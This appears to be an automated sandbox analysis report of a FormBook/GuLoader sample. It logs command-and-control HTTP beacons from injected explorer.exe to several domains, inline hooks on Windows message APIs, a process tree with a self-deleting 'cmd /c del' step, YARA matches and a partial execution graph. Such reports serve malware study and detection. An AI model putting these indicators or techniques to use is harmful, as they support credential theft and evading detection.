                                                                                                                                    Oct 11, 2023 22:57:51.976587057 CEST230OUTGET /ro12/?pR-=uQgh28/mwUTAreWLWMvWctCpaYYKSPk/RTU2hG/2GkXh2eCF81faGnz4QbuRWtjyYx7X&Wx=ChSLGhh0Mn9TylKP HTTP/1.1
                                                                                                                                    Host: www.qualityquickprints.com
                                                                                                                                    Connection: close
                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                    Data Ascii:
                                                                                                                                    Oct 11, 2023 22:57:52.296363115 CEST231INHTTP/1.1 410 Gone
                                                                                                                                    Server: openresty
                                                                                                                                    Date: Wed, 11 Oct 2023 20:57:52 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 36 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 71 75 61 6c 69 74 79 71 75 69 63 6b 70 72 69 6e 74 73 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 7<html>9 <head>56 <meta http-equiv='refresh' content='0; url=http://www.qualityquickprints.com/' />a </head>8</html>0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    4192.168.11.205001834.120.249.18180C:\Windows\explorer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Oct 11, 2023 22:58:13.359546900 CEST232OUTGET /ro12/?pR-=YIi7nDQw6o4IM6Y7GVEqMnWSon2sCGETt9fQ5s5Vu4Y8lCbsapzjTWOCPxSAe4pqXmXo&Wx=ChSLGhh0Mn9TylKP HTTP/1.1
                                                                                                                                    Host: www.55dy5s.top
                                                                                                                                    Connection: close
                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                    Data Ascii:
                                                                                                                                    Oct 11, 2023 22:58:13.678128958 CEST232INHTTP/1.1 200 OK
                                                                                                                                    Server: nginx/1.20.2
                                                                                                                                    Date: Wed, 11 Oct 2023 20:58:13 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 5208
                                                                                                                                    Last-Modified: Wed, 11 Oct 2023 10:00:52 GMT
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    ETag: "65267254-1458"
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Via: 1.1 google
                                                                                                                                    Connection: close
                                                                                                                                    Oct 11, 2023 22:58:13.679874897 CEST234INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63
                                                                                                                                    Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
                                                                                                                                    Oct 11, 2023 22:58:13.679963112 CEST235INData Raw: 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 2e 73 75 62 73 74 72 28 31 29 7c 7c 22 22 29 2e 73 70 6c 69 74 28 22 26 22 29 2c 6f 3d 7b 7d 2c 65
                                                                                                                                    Data Ascii: ar o=function(){for(var n=(window.location.search.substr(1)||"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.navigator.userAgent.toLowerCase();return n.indexOf
                                                                                                                                    Oct 11, 2023 22:58:13.680073977 CEST236INData Raw: 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 75 63 77 65 62 3f 22 61 6e 64 72 6f 69 64 22 3a 6e 2e 6d 61 74 63 68 28 2f 69 6f 73 2f 69 29 7c 7c 6e 2e 6d 61 74 63 68 28 2f 69 70 61 64 2f 69 29 7c
                                                                                                                                    Data Ascii: ent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/apad/i)?"android":window.ucbrowser?"iphone":"unknown"}()&&navigator.sendBeacon?send(s+="&is_beacon=1")
                                                                                                                                    Oct 11, 2023 22:58:13.680154085 CEST237INData Raw: 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 63 72 6f 73 73 6f 72 69 67 69 6e 22 2c 22 61 6e 6f 6e 79 6d 6f 75 73 22 29 2c 65 2e 73 65 74 41 74 74
                                                                                                                                    Data Ascii: ocument.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/js/vconsle.js"),$head.insertBefore(e,$head.lastChild)};break}}</script><title></title><script>var fontSize=w
                                                                                                                                    Oct 11, 2023 22:58:13.680197954 CEST238INData Raw: 69 63 2f 61 72 63 68 65 72 5f 69 6e 64 65 78 2e 33 36 39 61 36 36 33 62 30 38 61 35 35 64 33 30 35 62 39 37 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                    Data Ascii: ic/archer_index.369a663b08a55d305b97.js"></script></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    5192.168.11.2050019130.185.109.7780C:\Windows\explorer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Oct 11, 2023 22:59:14.631130934 CEST239OUTGET /ro12/?pR-=YvLwEHT7dF3wqOWcBoJhBcwDYJ3uuNfwUzugM5jE2WtwH9yjz4WpnbfVNhN3mQxE4RMu&Wx=ChSLGhh0Mn9TylKP HTTP/1.1
                                                                                                                                    Host: www.holzleisten24.shop
                                                                                                                                    Connection: close
                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                    Data Ascii:
                                                                                                                                    Oct 11, 2023 22:59:14.946597099 CEST239INHTTP/1.1 404 Not Found
                                                                                                                                    Server: nginx/1.6.2
                                                                                                                                    Date: Wed, 11 Oct 2023 20:59:14 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 168
                                                                                                                                    Connection: close
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    6192.168.11.2050020154.12.93.880C:\Windows\explorer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Oct 11, 2023 22:59:35.376043081 CEST240OUTGET /ro12/?pR-=0LOFVeHqsrMeo4L+dmJBR/0B/c0sqVoEg1WVw/8t1mjD3B4IGyZiGj+5uErL3J0wPr7A&Wx=ChSLGhh0Mn9TylKP HTTP/1.1
                                                                                                                                    Host: www.xlrj.asia
                                                                                                                                    Connection: close
                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                    Data Ascii:
                                                                                                                                    Oct 11, 2023 22:59:35.545150042 CEST241INHTTP/1.1 200 OK
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Wed, 11 Oct 2023 20:59:35 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    7192.168.11.2050021154.197.227.14280C:\Windows\explorer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Oct 11, 2023 22:59:57.794441938 CEST242OUTGET /ro12/?pR-=gzgOk9L9AfWHfN0tCkhRIi8dk8p3PFyiDnwZelvp2AG1WsshoUlVSypZKzCbkCaQBejH&Wx=ChSLGhh0Mn9TylKP HTTP/1.1
                                                                                                                                    Host: www.fathomtackle.com
                                                                                                                                    Connection: close
                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                    Data Ascii:
                                                                                                                                    Oct 11, 2023 22:59:59.100063086 CEST243INHTTP/1.1 404 Not Found
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Thu, 12 Oct 2023 04:59:15 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 466
                                                                                                                                    Connection: close
                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 d2 b3 c3 e6 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 71 71 2e 63 6f 6d 2f 34 30 34 2f 73 65 61 72 63 68 5f 63 68 69 6c 64 72 65 6e 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a c4 e3 b7 c3 ce ca b5 c4 d2 b3 c3 e6 b2 bb b4 e6 d4 da a1 a3 a1 a3 a1 a3 a1 a3 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e b7 b5 bb d8 d6 f7 d2 b3 3c 2f 61 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>404</title></head><body><script type="text/javascript" src="http://www.qq.com/404/search_children.js" charset="utf-8"></script> <a href="/"></a></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    8192.168.11.2050022185.104.28.23880C:\Windows\explorer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Oct 11, 2023 23:00:16.443831921 CEST243OUTGET /ro12/?pR-=4oHDpgyPUiJGP23m0SdAgh/yfEH8JJ8nkAUqpp/b29PXB/3TZ/gO5/kpv5F7QImaAVTW&Wx=ChSLGhh0Mn9TylKP HTTP/1.1
                                                                                                                                    Host: www.digitalserviceact.online
                                                                                                                                    Connection: close
                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                    Data Ascii:
                                                                                                                                    Oct 11, 2023 23:00:16.782454014 CEST244INHTTP/1.1 404 Not Found
                                                                                                                                    date: Wed, 11 Oct 2023 21:00:16 GMT
                                                                                                                                    server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.0.30
                                                                                                                                    content-length: 203
                                                                                                                                    content-type: text/html; charset=iso-8859-1
                                                                                                                                    connection: close
                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6f 31 32 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ro12/ was not found on this server.</p></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    9192.168.11.205002315.197.142.17380C:\Windows\explorer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Oct 11, 2023 23:00:36.461050034 CEST245OUTGET /ro12/?pR-=hMzxxbkXjK5UhHFUVKKzsXjiG5SdjoCmZm0mRTZiy05C1nCrhTC2iqR8bXRfdiWJf26x&Wx=ChSLGhh0Mn9TylKP HTTP/1.1
                                                                                                                                    Host: www.ddbetting.com
                                                                                                                                    Connection: close
                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                    Data Ascii:
                                                                                                                                    Oct 11, 2023 23:00:36.693012953 CEST245INHTTP/1.1 403 Forbidden
                                                                                                                                    Server: awselb/2.0
                                                                                                                                    Date: Wed, 11 Oct 2023 21:00:36 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 118
                                                                                                                                    Connection: close
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                                                                                                    Code Manipulations

                                                                                                                                    Function NameHook TypeActive in Processes
                                                                                                                                    PeekMessageAINLINEexplorer.exe
                                                                                                                                    PeekMessageWINLINEexplorer.exe
                                                                                                                                    GetMessageWINLINEexplorer.exe
                                                                                                                                    GetMessageAINLINEexplorer.exe
                                                                                                                                    Function NameHook TypeNew Data
                                                                                                                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x83 0x3E 0xE8
                                                                                                                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xE8
                                                                                                                                    GetMessageWINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xE8
                                                                                                                                    GetMessageAINLINE0x48 0x8B 0xB8 0x83 0x3E 0xE8

                                                                                                                                    Click to jump to process

                                                                                                                                    Click to jump to process

                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                    Click to jump to process

                                                                                                                                    Target ID:0
                                                                                                                                    Start time:22:55:10
                                                                                                                                    Start date:11/10/2023
                                                                                                                                    Path:C:\Users\user\Desktop\MaMsKRmgXZ.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\user\Desktop\MaMsKRmgXZ.exe
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:1'239'576 bytes
                                                                                                                                    MD5 hash:CED4AF5A976FB361BFDED06260F5985F
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.9888945373.0000000005969000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:2
                                                                                                                                    Start time:22:55:36
                                                                                                                                    Start date:11/10/2023
                                                                                                                                    Path:C:\Users\user\Desktop\MaMsKRmgXZ.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\user\Desktop\MaMsKRmgXZ.exe
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:1'239'576 bytes
                                                                                                                                    MD5 hash:CED4AF5A976FB361BFDED06260F5985F
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:4
                                                                                                                                    Start time:22:55:52
                                                                                                                                    Start date:11/10/2023
                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                                    Imagebase:0x7ff692610000
                                                                                                                                    File size:4'849'904 bytes
                                                                                                                                    MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:5
                                                                                                                                    Start time:22:55:55
                                                                                                                                    Start date:11/10/2023
                                                                                                                                    Path:C:\Windows\SysWOW64\cscript.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Windows\SysWOW64\cscript.exe
                                                                                                                                    Imagebase:0xc0000
                                                                                                                                    File size:144'896 bytes
                                                                                                                                    MD5 hash:13783FF4A2B614D7FBD58F5EEBDEDEF6
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                    Reputation:moderate
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:6
                                                                                                                                    Start time:22:55:59
                                                                                                                                    Start date:11/10/2023
                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:/c del "C:\Users\user\Desktop\MaMsKRmgXZ.exe"
                                                                                                                                    Imagebase:0xb40000
                                                                                                                                    File size:236'544 bytes
                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:7
                                                                                                                                    Start time:22:55:59
                                                                                                                                    Start date:11/10/2023
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff67de50000
                                                                                                                                    File size:875'008 bytes
                                                                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    Reset < >

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:21.3%
                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                      Signature Coverage:16.9%
                                                                                                                                      Total number of Nodes:1540
                                                                                                                                      Total number of Limit Nodes:47
                                                                                                                                      execution_graph 5184 401d41 5185 401d54 GetDlgItem 5184->5185 5186 401d47 5184->5186 5188 401d4e 5185->5188 5187 402b0a 17 API calls 5186->5187 5187->5188 5189 401d8f GetClientRect LoadImageA SendMessageA 5188->5189 5191 402b2c 17 API calls 5188->5191 5192 4029b8 5189->5192 5193 401deb 5189->5193 5191->5189 5193->5192 5194 401df3 DeleteObject 5193->5194 5194->5192 4115 401746 4116 402b2c 17 API calls 4115->4116 4117 40174d 4116->4117 4121 405ba2 4117->4121 4119 401754 4120 405ba2 2 API calls 4119->4120 4120->4119 4122 405bad GetTickCount GetTempFileNameA 4121->4122 4123 405bde 4122->4123 4124 405bda 4122->4124 4123->4119 4124->4122 4124->4123 5195 401947 5196 402b2c 17 API calls 5195->5196 5197 40194e lstrlenA 5196->5197 5198 4025e4 5197->5198 5199 401fc8 5200 402b2c 17 API calls 5199->5200 5201 401fcf 5200->5201 5202 406372 5 API calls 5201->5202 5203 401fde 5202->5203 5204 401ff6 GlobalAlloc 5203->5204 5205 40205e 5203->5205 5204->5205 5206 40200a 5204->5206 5207 406372 5 API calls 5206->5207 5208 402011 5207->5208 5209 406372 5 API calls 5208->5209 5210 40201b 5209->5210 5210->5205 5214 405f38 wsprintfA 5210->5214 5212 402052 5215 405f38 wsprintfA 5212->5215 5214->5212 5215->5205 5216 4025c8 5217 402b2c 17 API calls 5216->5217 5218 4025cf 5217->5218 5221 405b73 GetFileAttributesA CreateFileA 5218->5221 5220 4025db 5221->5220 4398 4014ca 4399 405101 24 API calls 4398->4399 4400 4014d1 4399->4400 5229 40484b 5230 404877 5229->5230 5231 40485b 5229->5231 5232 4048aa 5230->5232 5233 40487d SHGetPathFromIDListA 5230->5233 5240 4056da GetDlgItemTextA 5231->5240 5235 404894 SendMessageA 5233->5235 5236 40488d 5233->5236 5235->5232 5238 40140b 2 API calls 5236->5238 5237 404868 SendMessageA 5237->5230 5238->5235 5240->5237 4401 40254c 4402 402b6c 17 API calls 4401->4402 4403 402556 4402->4403 4404 402b0a 17 API calls 4403->4404 4405 40255f 4404->4405 4406 402783 4405->4406 4407 402586 RegEnumValueA 4405->4407 4408 40257a RegEnumKeyA 4405->4408 4409 40259b 4407->4409 4410 4025a2 RegCloseKey 4407->4410 4408->4410 4409->4410 4410->4406 5241 6ec015d1 5247 6ec014bb 5241->5247 5243 6ec0162f GlobalFree 5244 6ec015e9 5244->5243 5245 